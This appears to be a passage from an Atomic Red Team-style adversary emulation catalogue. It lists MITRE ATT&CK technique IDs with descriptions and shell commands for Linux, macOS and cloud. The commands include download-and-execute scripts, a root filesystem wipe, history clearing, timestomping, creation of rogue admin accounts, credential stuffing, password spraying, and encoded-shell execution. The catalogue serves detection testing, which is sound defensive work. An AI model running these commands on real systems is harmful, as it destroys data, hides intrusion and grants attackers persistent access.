which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}
T1059.006 sh linux Execute Python via Python executables
Python
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}
T1059.006 sh linux Python pty module and spawn function used to spawn sh or bash
Python
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
T1069.001 sh linux, macos Permission Groups Discovery (Local)
Local Groups
Permission Groups Discovery
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
if [ -x "$(command -v id)" ]; then id; else echo "id is missing from the machine. skipping..."; fi;
if [ -x "$(command -v getent)" ]; then getent group; else echo "getent is missing from the machine. skipping..."; fi;
cat /etc/group
T1069.001 sh containers Permission Groups Discovery for Containers- Local Groups
Local Groups
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
docker run --name t1069_container --rm -d -t t1069
docker exec t1069_container ./test.sh
T1069.002 sh linux Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
Domain Groups
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" "(objectClass=group)" -s sub -a always -z 1000 dn
T1070.003 sh linux, macos Clear Bash history (rm)
Clear Command History
Clears bash history via rm
rm #{history_path}
T1070.003 sh linux Clear Bash history (echo)
Clear Command History
Clears bash history via echo
echo "" > #{history_path}
T1070.003 sh linux, macos Clear Bash history (cat dev/null)
Clear Command History
Clears bash history via cat /dev/null
cat /dev/null > #{history_path}
T1070.003 sh linux, macos Clear Bash history (ln dev/null)
Clear Command History
Clears bash history via a symlink to /dev/null
ln -sf /dev/null #{history_path}
T1070.003 sh linux Clear Bash history (truncate)
Clear Command History
Clears bash history via truncate
truncate -s0 #{history_path}
T1070.003 sh linux, macos Clear history of a bunch of shells
Clear Command History
Clears the history of a bunch of different shell types by setting the history size to zero
unset HISTFILE
export HISTFILESIZE=0
history -c
T1070.003 sh linux, macos Use Space Before Command to Avoid Logging to History
Clear Command History
Using a space before a command causes the command to not be logged in the Bash History file
hostname
whoami
T1070.003 sh linux Disable Bash History Logging with SSH -T
Clear Command History
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname
T1070.004 sh linux, macos Delete a single file - FreeBSD/Linux/macOS
File Deletion
Delete a single file from the temporary directory
rm -f #{file_to_delete}
T1070.004 sh linux, macos Delete an entire folder - FreeBSD/Linux/macOS
File Deletion
Recursively delete the temporary directory and all files contained within it
rm -rf #{folder_to_delete}
T1070.004 sh linux Overwrite and delete a file with shred
File Deletion
Use the shred command to overwrite the temporary file and then delete it
shred -u #{file_to_shred}
T1070.004 sh linux Delete Filesystem - Linux
File Deletion
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
T1070.006 sh linux, macos Set a file's access timestamp
Timestomp
Stomps on the access timestamp of a file
touch -a -t 197001010000.00 #{target_filename}
T1070.006 sh linux, macos Set a file's modification timestamp
Timestomp
Stomps on the modification timestamp of a file
touch -m -t 197001010000.00 #{target_filename}
T1070.006 sh elevated linux, macos Set a file's creation timestamp
Timestomp
Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution.
NOW=$(date +%m%d%H%M%Y)
date 010100001971
touch #{target_filename}
date "$NOW"
stat #{target_filename}
T1070.006 sh linux, macos Modify file timestamps using reference file
Timestomp
Modifies the modify and access timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers.
touch #{target_file_path}
touch -acmr #{reference_file_path} #{target_file_path}
T1070.006 sh macos MacOS - Timestomp Date Modified
Timestomp
Stomps on the modification timestamp of a file using MacOS's SetFile utility
SetFile -m #{target_date} #{target_filename}
T1071.001 sh linux, macos Malicious User Agents - Nix
Web Protocols
This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
T1074.001 sh linux, macos Stage data from Discovery.sh
Local Data Staging
Utilize curl to download discovery.sh and execute a basic information gathering shell script
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}
T1078.001 sh elevated macos Enable Guest Account on macOS
Default Accounts
This test enables the guest account on macOS using sysadminctl utility.
sudo sysadminctl -guestAccount on
T1078.003 sh elevated linux Reactivate a locked/expired account (FreeBSD)
Local Accounts
A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
T1078.003 sh elevated linux Login as nobody (freebsd)
Local Accounts
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look like in /etc/passwd before the test is executed and right after the cleanup: # - nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
cat /etc/passwd |grep nobody
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit
T1078.004 sh google-workspace, iaas:gcp Creating GCP Service Account and Service Account Key
Cloud Accounts
GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud.
gcloud config set project #{project-id}
gcloud iam service-accounts create #{service-account-name}
gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
T1078.004 sh iaas:gcp GCP - Create Custom IAM Role
Cloud Accounts
This atomic will create a new IAM role. The default role permissions are: IAM Service Account Get. The idea for this Atomic came from a Rule published by the Elastic team. Identifies an Identity and Access Management (IAM) custom role creation in Google Cloud Platform (GCP). Custom roles are user-defined, and allow for the bundling of one or more supported permissions to meet specific needs. Custom roles will not be updated automatically and could lead to privilege creep if not carefully scrutinized. This atomic will create a new IAM role. The default role permissions are: IAM Service Account Get Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
gcloud config set project #{project-id}
gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
T1082 sh macos System Information Discovery
System Information Discovery
Identify System Info
system_profiler
ls -al /Applications
T1082 sh linux, macos List OS Information
System Information Discovery
Identify System Info
uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi   
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/null
T1082 sh linux FreeBSD VM Check via Kernel Modules
System Information Discovery
Identify virtual machine host kernel modules.
kldstat | grep -i "vmm"
kldstat | grep -i "vbox"
T1082 sh linux, macos Hostname Discovery
System Information Discovery
Identify system hostname for FreeBSD, Linux and macOS systems.
hostname
T1082 sh linux, macos Environment variables discovery on freebsd, macos and linux
System Information Discovery
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
env
T1082 sh macos Show System Integrity Protection status (MacOS)
System Information Discovery
Read and Display System Intergrety Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.
csrutil status
T1082 sh linux Linux List Kernel Modules
System Information Discovery
Enumerate kernel modules installed 3 different ways. Upon successful execution stdout will display kernel modules installed on host 2 times, followed by list of modules matching 'vmw' if present.
lsmod
kmod list
grep vmw /proc/modules
T1082 sh linux FreeBSD List Kernel Modules
System Information Discovery
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
kldstat
kldstat | grep vmm
T1082 sh macos sysctl to gather macOS hardware info
System Information Discovery
Gets the macOS hardware information, which can be used to determine whether the target macOS host is running on a physical or virtual machine. sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.
sysctl -n hw.model
T1083 sh linux, macos Nix File and Directory Discovery
File and Directory Discovery
Find or discover files on the file system References: http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/
ls -a >> #{output_file}
if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
file */* *>> #{output_file}
cat #{output_file} 2>/dev/null
find . -type f
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
locate *
which sh
T1083 sh linux, macos Nix File and Directory Discovery 2
File and Directory Discovery
Find or discover files on the file system
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
cat #{output_file}
find . -type f -name ".*"
T1083 sh linux Identifying Network Shares - Linux
File and Directory Discovery
If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares. Attackers may then attempt to access these shares for lateral movement or data exfiltration.
findmnt -t nfs
T1087.001 sh linux Enumerate all accounts (Local)
Local Account
Enumerate all accounts by copying /etc/passwd to another file
cat /etc/passwd > #{output_file}
cat #{output_file}
T1087.001 sh elevated linux, macos View sudoers access
Local Account
(requires root)
if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > #{output_file}; fi;
if [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > #{output_file}; fi;
cat #{output_file}
T1087.001 sh linux, macos View accounts with UID 0
Local Account
View accounts with UID 0
grep 'x:0:' /etc/passwd > #{output_file}
grep '*:0:' /etc/passwd >> #{output_file}
cat #{output_file} 2>/dev/null
T1087.001 sh linux, macos List opened files by user
Local Account
List opened files by user
username=$(id -u -n) && lsof -u $username
T1087.001 sh linux Show if a user account has ever logged in remotely
Local Account
Show if a user account has ever logged in remotely
[ "$(uname)" = 'FreeBSD' ] && cmd="lastlogin" || cmd="lastlog" 
$cmd > #{output_file}
cat #{output_file}
T1087.001 sh linux, macos Enumerate users and groups
Local Account
Utilize groups and id to enumerate users and groups
groups
id
T1087.001 sh macos Enumerate users and groups
Local Account
Utilize local utilities to enumerate users and groups
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
dscacheutil -q group
dscacheutil -q user
T1087.002 sh linux Active Directory Domain Search
Domain Account
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
T1087.002 sh linux Account Enumeration with LDAPDomainDump
Domain Account
This test uses LDAPDomainDump to perform account enumeration on a domain. [Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
T1090.001 sh linux, macos Connection Proxy
Internal Proxy
Enable traffic redirection. Note that this test may conflict with pre-existing system configuration.
export #{proxy_scheme}_proxy=#{proxy_server}:#{proxy_port}
curl #{test_url}
T1090.001 sh macos Connection Proxy for macOS UI
Internal Proxy
Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. Note that this test may conflict with pre-existing system configuration.
networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}
T1090.003 sh elevated linux Tor Proxy Usage - Debian/Ubuntu/FreeBSD
Multi-hop Proxy
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched.
[ "$(uname)" = 'FreeBSD' ] && sysrc tor_enable="YES" && service tor start || sudo systemctl start tor
T1090.003 sh macos Tor Proxy Usage - MacOS
Multi-hop Proxy
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched.
osascript -e 'tell application "Terminal" to do script "tor"'
T1098 sh iaas:aws AWS - Create a group and add a user to that group
Account Manipulation
Adversaries create AWS group, add users to specific to that group to elevate their privileges to gain more accesss
aws iam create-group --group-name #{username}
aws iam add-user-to-group --user-name #{username} --group-name #{username}
T1098 sh iaas:gcp GCP - Delete Service Account Key
Account Manipulation
This Atomic will: - Create a service account - Create a service account key, - Store the result of retrieving a single key for that service account as a variable - Pass that variable for deletion - Delete the service account The idea for this Atomic came from a Rule published by the Elastic team. Identifies the deletion of an Identity and Access Management (IAM) service account key in Google Cloud Platform (GCP). Each service account is associated with two sets of public/private RSA key pairs that are used to authenticate. If a key is deleted, the application will no longer be able to access Google Cloud resources using that key. A security best practice is to rotate your service account keys regularly. Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
gcloud config set project #{project_id}
KEY=`gcloud iam service-accounts keys list --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1`
gcloud iam service-accounts keys delete $KEY --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --quiet
T1098.001 sh iaas:aws AWS - Create Access Key and Secret Key
Additional Cloud Credentials
Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised
aws iam create-access-key --user-name #{username} > "$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds"
cd "$PathToAtomicsFolder/T1098.001/bin/"
./aws_secret.sh
T1098.004 sh linux, macos Modify SSH Authorized Keys
SSH Authorized Keys
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys; fi;
T1105 sh elevated linux, macos rsync remote file copy (push)
Ingress Tool Transfer
Utilize rsync to perform a remote file copy (push)
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
T1105 sh linux, macos rsync remote file copy (pull)
Ingress Tool Transfer
Utilize rsync to perform a remote file copy (pull)
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
T1105 sh linux, macos scp remote file copy (push)
Ingress Tool Transfer
Utilize scp to perform a remote file copy (push)
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
T1105 sh linux, macos scp remote file copy (pull)
Ingress Tool Transfer
Utilize scp to perform a remote file copy (pull)
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
T1105 sh linux, macos sftp remote file copy (pull)
Ingress Tool Transfer
Utilize sftp to perform a remote file copy (pull)
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
T1105 sh linux, macos whois file download
Ingress Tool Transfer
Download a remote file using the whois utility
timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
T1105 sh linux Linux Download File and Run
Ingress Tool Transfer
Utilize linux Curl to download a remote file, chmod +x it and run it.
curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
T1105 sh macos File download via nscurl
Ingress Tool Transfer
Use nscurl to download and write a file/payload from the internet. -k = Disable certificate checking -o = Output destination
nscurl -k "#{remote_file}" -o "#{destination_path}"
T1110.003 sh iaas:aws AWS - Password Spray an AWS using GoAWSConsoleSpray
Password Spraying
GoAWSConsoleSpray is a tool that can be used to spray AWS IAM Console Credentials in order to identify a valid login for a user account built by WhiteOakSecurity. For more details reagrding the tool, check - https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/
cd /tmp
git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
cd /tmp/GoAWSConsoleSpray
go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
T1110.004 sh linux SSH Credential Stuffing From FreeBSD
Credential Stuffing
Using username,password combination from a password dump to login over SSH.
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1113 sh linux X Windows Capture (freebsd)
Screen Capture
Use xwd command to collect a full desktop screenshot and review file with xwud
xwd -root -out #{output_file}
xwud -in #{output_file}
T1113 sh linux Capture Linux Desktop using Import Tool (freebsd)
Screen Capture
Use import command from ImageMagick to collect a full desktop screenshot
import -window root #{output_file}
T1115 sh linux Add or copy content to clipboard with xClip
Clipboard Data
Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt
T1123 sh macos using Quicktime Player
Audio Capture
Use AppleScript to get Quicktime Player to record an audio file from the default microphone. Should create a non-empty m4a file with sound from the microphone. - requires Automation permissions but no additional microphone permissions - saves file in /tmp by default. Other locations likely to require more permissions.
sh #{filename} #{audiofile} #{duration}
T1124 sh linux, macos System Time Discovery in FreeBSD/macOS
System Time Discovery
Identify system time. Upon execution, the local computer system time and timezone will be displayed.
date
T1132.001 sh macos, linux Base64 Encoded data.
Standard Encoding
Utilizing a common technique for posting base64 encoded data.
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
T1132.001 sh linux Base64 Encoded data (freebsd)
Standard Encoding
Utilizing a common technique for posting base64 encoded data.
echo -n 111-11-1111 | b64encode -r -
curl -XPOST #{base64_data}.#{destination_url}
T1135 sh macos Network Share Discovery
Network Share Discovery
Network Share Discovery
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
T1135 sh elevated linux Network Share Discovery - FreeBSD
Network Share Discovery
Network Share Discovery using smbstatus
smbstatus --shares
T1136.001 sh elevated linux Create a user account on a FreeBSD system
Local Account
Create a user via pw
pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account
T1136.001 sh elevated linux Create a new user in FreeBSD with `root` GID.
Local Account
Creates a new user in FreeBSD and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0
T1136.002 sh linux Active Directory Create Admin Account
Domain Account
Use Admin Credentials to Create A Domain Admin Account
echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
T1136.002 sh linux Active Directory Create User Account (Non-elevated)
Domain Account
Use Admin Credentials to Create A Normal Account (as means of entry)
echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
T1136.003 sh iaas:aws AWS - Create a new IAM user
Cloud Account
Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time
aws iam create-user --user-name #{username}
T1140 sh linux, macos Base64 decoding with Python
Deobfuscate/Decode Files or Information
Use Python to decode a base64-encoded text string and echo it to the console
ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())')
python3 -c "import base64;dec=base64.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "import base64 as d;dec=d.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode;dec=b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode as d;dec=d(\"$ENCODED\");print(dec.decode())"
echo $ENCODED | python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())"
echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())"
T1140 sh linux, macos Base64 decoding with Perl
Deobfuscate/Decode Files or Information
Use Perl to decode a base64-encoded text string and echo it to the console
ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));")
perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));"
echo $ENCODED | perl -le 'use MIME::Base64;print(decode_base64(<STDIN>));'
echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));'
T1140 sh linux, macos Base64 decoding with shell utilities
Deobfuscate/Decode Files or Information
Use common shell utilities to decode a base64-encoded text string and echo it to the console
ENCODED=$(echo '#{message}' | base64)
printf $ENCODED | base64 -d
echo $ENCODED | base64 -d
echo $(echo $ENCODED) | base64 -d
echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file}
echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
T1140 sh linux Base64 decoding with shell utilities (freebsd)
Deobfuscate/Decode Files or Information
Use common shell utilities to decode a base64-encoded text string and echo it to the console
ENCODED=$(echo '#{message}' | b64encode -r -)
printf $ENCODED | b64decode -r
echo $ENCODED | b64decode -r
echo $(echo $ENCODED) | b64decode -r
echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}
echo $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r
T1140 sh linux FreeBSD b64encode Shebang in CLI
Deobfuscate/Decode Files or Information
Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it.
echo #{bash_encoded} | b64decode -r | sh
echo #{dash_encoded} | b64decode -r | sh
echo #{fish_encoded} | b64decode -r | sh
echo #{sh_encoded} | b64decode -r | sh
T1140 sh linux, macos Hex decoding with shell utilities
Deobfuscate/Decode Files or Information
Use common shell utilities to decode a hex-encoded text string and echo it to the console
ENCODED=$(echo '#{message}' | xxd -ps -c 256)
printf $ENCODED | xxd -r -p
echo $ENCODED | xxd -r -p
echo $(echo $ENCODED) | xxd -r -p
echo $ENCODED > #{encoded_file} && xxd -r -p #{encoded_file}
echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
T1140 sh linux, macos Linux Base64 Encoded Shebang in CLI
Deobfuscate/Decode Files or Information
Using Linux Base64 Encoded shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it.
echo #{bash_encoded} | base64 -d | bash
echo #{dash_encoded} | base64 -d | bash
echo #{fish_encoded} | base64 -d | bash
echo #{sh_encoded} | base64 -d | bash
T1201 sh linux Examine password complexity policy - FreeBSD
Password Policy Discovery
Lists the password complexity policy to console on FreeBSD.
cat /etc/pam.d/passwd
T1201 sh iaas:aws Examine AWS Password Policy
Password Policy Discovery
This atomic test will display details about the password policy for the current AWS account.
aws iam get-account-password-policy
T1217 sh linux List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux
Browser Information Discovery
Searches for Mozilla Firefox's places.sqlite file (on FreeBSD or Linux distributions) that contains bookmarks and lists any found instances to a text file.
find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
T1217 sh macos List Mozilla Firefox Bookmark Database Files on macOS
Browser Information Discovery
Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file.
find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
T1217 sh macos List Google Chrome Bookmark JSON Files on macOS
Browser Information Discovery
Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file.
find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
T1217 sh linux List Google Chromium Bookmark JSON Files on FreeBSD
Browser Information Discovery
Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file.
find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
T1217 sh macos List Safari Bookmarks on MacOS
Browser Information Discovery
This test searches for Safari's Bookmarks file (on macOS) and lists any found instances to a text file.
find / -path "*/Safari/Bookmarks.plist" 2>/dev/null >> #{output_file} 
cat #{output_file}
T1222.002 sh linux, macos chmod - Change file or folder mode (numeric mode)
Linux and Mac Permissions
Changes a file or folder's permissions using chmod and a specified numeric mode.
chmod #{numeric_mode} #{file_or_folder}
T1222.002 sh linux, macos chmod - Change file or folder mode (symbolic mode)
Linux and Mac Permissions
Changes a file or folder's permissions using chmod and a specified symbolic mode.
chmod #{symbolic_mode} #{file_or_folder}
T1222.002 sh linux, macos chmod - Change file or folder mode (numeric mode) recursively
Linux and Mac Permissions
Changes a file or folder's permissions recursively using chmod and a specified numeric mode.
chmod -R #{numeric_mode} #{file_or_folder}
